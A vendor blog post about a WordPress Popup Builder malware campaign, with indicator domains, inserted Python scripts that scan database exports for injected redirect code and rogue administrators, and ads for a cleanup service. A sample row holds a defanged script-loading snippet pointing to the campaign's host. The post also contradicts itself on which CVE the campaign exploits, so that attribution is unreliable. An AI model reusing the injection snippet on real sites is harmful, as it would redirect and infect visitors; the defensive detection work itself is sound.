How a Malware Campaign Exploits the Popup Builder WordPress Plugin to Infect 3,900+ Sites

Reliqus Marketing

03 April 2024

By Ankit Bhatia
Founder & CEO

A new malware campaign has been discovered that is exploiting a high-severity security flaw in the Popup Builder plugin for WordPress.

This campaign has been active for the past three weeks and has already infected over 3,900 sites, according to PublicWWW.

Sucuri Security researcher Puja Srivastava, in a report from March 7, notes that these attacks are orchestrated from domains less than a month old, with registrations dating back to February 12, 2024:

ttincoming.traveltraffic[.]cc

Host.cloudsonicwave[.]com

The infection process involves exploiting CVE-2023-6000, a vulnerability in Popup Builder that allows attackers to create rogue admin users and install arbitrary plugins.

With the rise of these cyber threats, Reliqus Consulting has stepped forward, offering specialized WordPress website malware removal services designed to tackle even the most challenging infections. 

Understanding the technical and financial strains that plugin vulnerabilities can impose on site owners, we provide an affordable yet comprehensive cleanup solution at just $79. Our team of experts is adept at clearing infected sites and implementing robust defenses to shield against future vulnerabilities.

Malicious Code and Indicators of Compromise

In the recent malware campaign targeting the Popup Builder WordPress Plugin, attackers exploit a known vulnerability to inject malicious code into websites. 

The injected code is placed in the plugin's Custom JS or CSS section, which is accessible through the WordPress admin interface, and is stored in the wp_postmeta database table.

The malware campaign exploiting the Popup Builder WordPress Plugin is not the first of its kind to shock the WordPress community. Earlier in January, a similar strategy was employed in the Balada Injector campaign, which impacted over 7,000 sites by exploiting a different vulnerability. 

Two distinct variations of this malicious code have been identified in the databases of infected sites. 

[Figure: malicious code variant 1 and variant 2 as found in the database]

The injected code registers itself as a handler for specific Popup Builder events: sgpb-ShouldOpen, sgpb-ShouldClose, sgpb-WillOpen, sgpbDidOpen, sgpbWillClose, and sgpb-DidClose. These events fire at different stages of the popup display process: when a popup is about to open, is opening, has opened, is about to close, and has closed.

In some variations of this attack, the URL “hxxp://ttincoming.traveltraffic[.]cc/?traffic” is injected as the redirect-url parameter of a “contact-form-7” popup, which sends unsuspecting website visitors to malicious sites.

SiteCheck, Sucuri's remote scanning tool, flags these injections under the identifier malware?pbuilder_injection.1.x.

[Figure: SiteCheck detection of the Popup Builder malware injection]

This identification helps website administrators quickly identify and address these harmful injections, underscoring the importance of regular site scans and updates in the battle against malware exploitation.
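To make the indicators above actionable, here is an added example written for this article (it is not code from the original post, from Sucuri, or from the Popup Builder project): a small Python triage script that reads rows exported from wp_postmeta and flags the injection shapes described here, namely a custom-JS event-handler slot that loads code from another host, a redirect-url that leaves the site, and any reference to the two indicator domains. The meta_key names (the event names and sgpb-redirect-url), the site host, and the sample rows are constructed assumptions; a real installation may store these options in a different shape, so adapt the query to what you find in your database.

```python
"""Triage of Popup Builder settings exported from wp_postmeta.

Added example; the meta_key names and sample rows below are constructed
assumptions, not Popup Builder's documented storage format.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicator domains quoted in the post, written plainly for matching.
IOC_DOMAINS = {"ttincoming.traveltraffic.cc", "host.cloudsonicwave.com"}

# Popup Builder event names the post lists as the abused handler slots.
SGPB_EVENTS = {"sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen",
               "sgpbDidOpen", "sgpbWillClose", "sgpb-DidClose"}

# Reference query for a live database (the key prefix is an assumption);
# the scan below applies the same logic offline to exported rows.
POSTMETA_QUERY = """
SELECT post_id, meta_key, meta_value
  FROM wp_postmeta
 WHERE meta_key LIKE 'sgpb%'
    OR meta_value LIKE '%traveltraffic%'
    OR meta_value LIKE '%cloudsonicwave%';
"""

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    post_id: int
    meta_key: str
    category: str   # "ioc", "handler" or "redirect"
    detail: str


def refang(value: str) -> str:
    """Normalise defanged IoCs ('hxxp://a[.]b') so they match live content."""
    return value.replace("hxxp", "http").replace("[.]", ".")


def external_hosts(text: str, site_host: str) -> set[str]:
    """Hostnames referenced by URLs in text, excluding the site's own host."""
    return {h.lower() for h in URL_RE.findall(text) if h.lower() != site_host.lower()}


def scan_postmeta(rows, site_host: str) -> list[Finding]:
    """rows: (post_id, meta_key, meta_value) tuples exported from wp_postmeta."""
    findings: list[Finding] = []
    for post_id, meta_key, meta_value in rows:
        value = refang(meta_value or "")
        hosts = external_hosts(value, site_host)
        hits = sorted(hosts & IOC_DOMAINS)
        if hits:
            findings.append(Finding(post_id, meta_key, "ioc", hits[0]))
        elif meta_key in SGPB_EVENTS and ("<script" in value.lower() or hosts):
            # A custom-JS event handler that pulls code from another host is
            # the injection shape the post describes, whatever the domain.
            findings.append(Finding(post_id, meta_key, "handler",
                                    ", ".join(sorted(hosts)) or "inline script"))
        elif meta_key.endswith("redirect-url") and hosts:
            findings.append(Finding(post_id, meta_key, "redirect", sorted(hosts)[0]))
    return findings


# Constructed sample export: posts 101 and 102 carry the indicator domain
# from the post, 104 and 105 show the same shapes with a made-up host, and
# post 101's own on-site redirect and post 103 are benign.
SITE_HOST = "example-shop.test"
SAMPLE_ROWS = [
    (101, "sgpb-ShouldOpen",
     'var s=document.createElement("script");'
     's.src="hxxp://ttincoming.traveltraffic[.]cc/?traffic";'
     'document.head.appendChild(s);'),
    (101, "sgpb-redirect-url", "https://example-shop.test/thank-you"),
    (102, "sgpb-redirect-url", "hxxp://ttincoming.traveltraffic[.]cc/?traffic"),
    (103, "sgpb-WillOpen", "console.log('popup opening');"),
    (104, "sgpbDidOpen", '<script src="https://cdn.unknown-tracker.test/p.js"></script>'),
    (105, "sgpb-redirect-url", "https://promo.unknown-tracker.test/go"),
]

if __name__ == "__main__":
    for f in scan_postmeta(SAMPLE_ROWS, SITE_HOST):
        print(f"post {f.post_id} {f.meta_key}: {f.category} ({f.detail})")
```

The "handler" and "redirect" rules deliberately do not depend on the two known domains: the campaign rotates infrastructure, so a handler slot that fetches a script from any host other than your own is worth a look even when the domain is not yet on an indicator list.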

Mitigation Steps and Malware Removal

To combat these threats, WordPress site owners are urged to be vigilant. If your site is currently running an unpatched version of the Popup Builder plugin, immediate action can mitigate the risk of infection. 

Begin by updating the plugin or implementing a web application firewall as a protective measure. For sites already compromised, the initial step involves a thorough cleaning to remove the injected malware, particularly from the “Custom JS or CSS” section accessible through the Popup Builder interface in the WordPress admin area. 

However, it’s essential to understand that this action is a temporary fix. The malware can quickly reinfect compromised environments if comprehensive measures are not taken. To ensure the malware does not re-establish itself, conducting a detailed scan of the website at both the client and server levels is paramount. 

During this process, any malicious code detected should be eradicated, and the presence of unfamiliar site administrators should be thoroughly investigated and resolved. After cleaning, it is imperative to update the Popup Builder plugin to the latest version without delay.
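The check for unfamiliar administrators is easy to script. The following is an added example written for this article (not code from the post or from Sucuri) that reads wp_users and wp_usermeta exports, parses the PHP-serialized capabilities value, and flags any account holding the administrator role that is not on the owner's list, or that is a known login but was created on or after the February 12, 2024 campaign start mentioned above. The allowlist, the sample accounts, and the default wp_ table prefix are constructed assumptions.

```python
"""Audit WordPress administrator accounts after a compromise.

Added example; the allowlist, sample accounts and the default wp_ table
prefix are constructed assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime

# Registration date of the campaign's domains, as given in the post.
CAMPAIGN_START = datetime(2024, 2, 12)

# Administrators the site owner actually created (constructed allowlist).
KNOWN_ADMINS = {"owner", "webdev"}

# Roles live in wp_usermeta under the key '<prefix>capabilities' as a
# PHP-serialized array, e.g. a:1:{s:13:"administrator";b:1;}.
# This pulls out every role whose flag is true.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_capabilities(serialized: str) -> set[str]:
    return set(ROLE_RE.findall(serialized))


@dataclass(frozen=True)
class AdminFinding:
    user_id: int
    user_login: str
    reason: str


def audit_admins(users, usermeta, known_admins=KNOWN_ADMINS,
                 since=CAMPAIGN_START, prefix="wp_") -> list[AdminFinding]:
    """users: (ID, user_login, user_registered) rows from wp_users;
    usermeta: (user_id, meta_key, meta_value) rows from wp_usermeta.
    On a live site the same list is available from WP-CLI:
      wp user list --role=administrator --fields=ID,user_login,user_registered
    """
    roles = {uid: roles_from_capabilities(val)
             for uid, key, val in usermeta if key == prefix + "capabilities"}
    findings: list[AdminFinding] = []
    for uid, login, registered in users:
        if "administrator" not in roles.get(uid, set()):
            continue
        created = datetime.strptime(registered, "%Y-%m-%d %H:%M:%S")
        if login not in known_admins:
            findings.append(AdminFinding(uid, login, "administrator not on the known list"))
        elif created >= since:
            findings.append(AdminFinding(uid, login, "known login but created inside the campaign window"))
    return findings


# Constructed sample export: user 4 is a rogue account created during the
# campaign; user 5 is an old account that has quietly gained the admin role.
SAMPLE_USERS = [
    (1, "owner", "2019-05-03 10:12:44"),
    (2, "webdev", "2022-11-20 08:00:00"),
    (3, "editor_jane", "2023-07-01 09:30:00"),
    (4, "wpadmin_support", "2024-02-27 03:14:09"),
    (5, "backup_user", "2021-01-15 12:00:00"),
]
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (4, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (5, "wp_capabilities", 'a:2:{s:10:"subscriber";b:1;s:13:"administrator";b:1;}'),
    (4, "nickname", "wpadmin_support"),
]

if __name__ == "__main__":
    for f in audit_admins(SAMPLE_USERS, SAMPLE_USERMETA):
        print(f"user {f.user_id} ({f.user_login}): {f.reason}")
```

Matching on the role rather than on the login name matters: an attacker who already has database access can grant the administrator role to an existing, innocuous-looking account, which is why the old backup_user is flagged alongside the obviously new one. If your site uses a custom table prefix, pass it as prefix so the capabilities key is matched correctly.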

For a more detailed guide on addressing such issues, website owners are encouraged to read our full blog on how to remove malware from WordPress websites. Remember, failing to keep your website’s software and components updated exposes you to significant risks. Regular updates and the use of a website firewall are recommended to maintain security.

Srivastava highlights the significance of this situation by stating, “This new malware campaign serves as a stark reminder of the risks of not keeping your website software patched and up-to-date,” underlining the critical nature of maintaining website security through regular updates and utilizing a website firewall. 

In cases of persistent infections or the need for expert assistance, we offer WordPress website malware removal services for just $79. Our dedicated experts employ the latest tools and techniques to ensure your site is clean, secure, and performing optimally.

Additional WordPress Plugin Vulnerabilities

The recent disclosure by the WordPress security firm Wordfence regarding a high-severity bug in the Ultimate Member plugin that can inject malicious web scripts underlines the ongoing battle against vulnerabilities within the WordPress ecosystem.

The core of the malware campaign lies in its exploitation of a critical cross-site scripting (XSS) flaw within the Popup Builder WordPress Plugin, identified as CVE-2024-2123, which carries a CVSS score of 7.2. This vulnerability affects all plugin versions up to and including 2.8.3. Fortunately, the developers addressed the flaw with the release of version 2.8.4 on March 6, 2024. 

The vulnerability stems from insufficient input sanitization and output escaping, enabling unauthenticated attackers to inject arbitrary web scripts into pages. These scripts are executed whenever a user visits these pages, posing a significant security risk.

Highlighting the severity, Wordfence remarked, “Combined with the fact that attackers can exploit the vulnerability with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited.” 

This statement underscores the potential for unauthenticated attackers to inject malicious code and gain administrative control over affected websites. It showcases the critical nature of this vulnerability and the importance of promptly updating to the patched version to secure websites against this exploit.

Conclusion

This recent malware attack targeting WordPress sites through the Popup Builder plugin serves as a stark wake-up call for website managers everywhere. This incident underscores the critical need for regular monitoring, timely updates, and the implementation of robust security protocols. 

In situations where malware has taken hold, dealing with the aftermath can be both expensive and time-consuming. 

Reliqus understands the challenges that come with maintaining a secure online environment and offers affordable, thorough malware removal services, giving site owners access to a cost-effective and expert solution.

With the right support, achieving a high level of security and peace of mind is not only necessary but entirely achievable.

Ankit Bhatia

Founder & CEO at Reliqus

With 12+ years of experience building a web presence for 300+ businesses, Ankit understands how businesses can use technology to increase revenue.
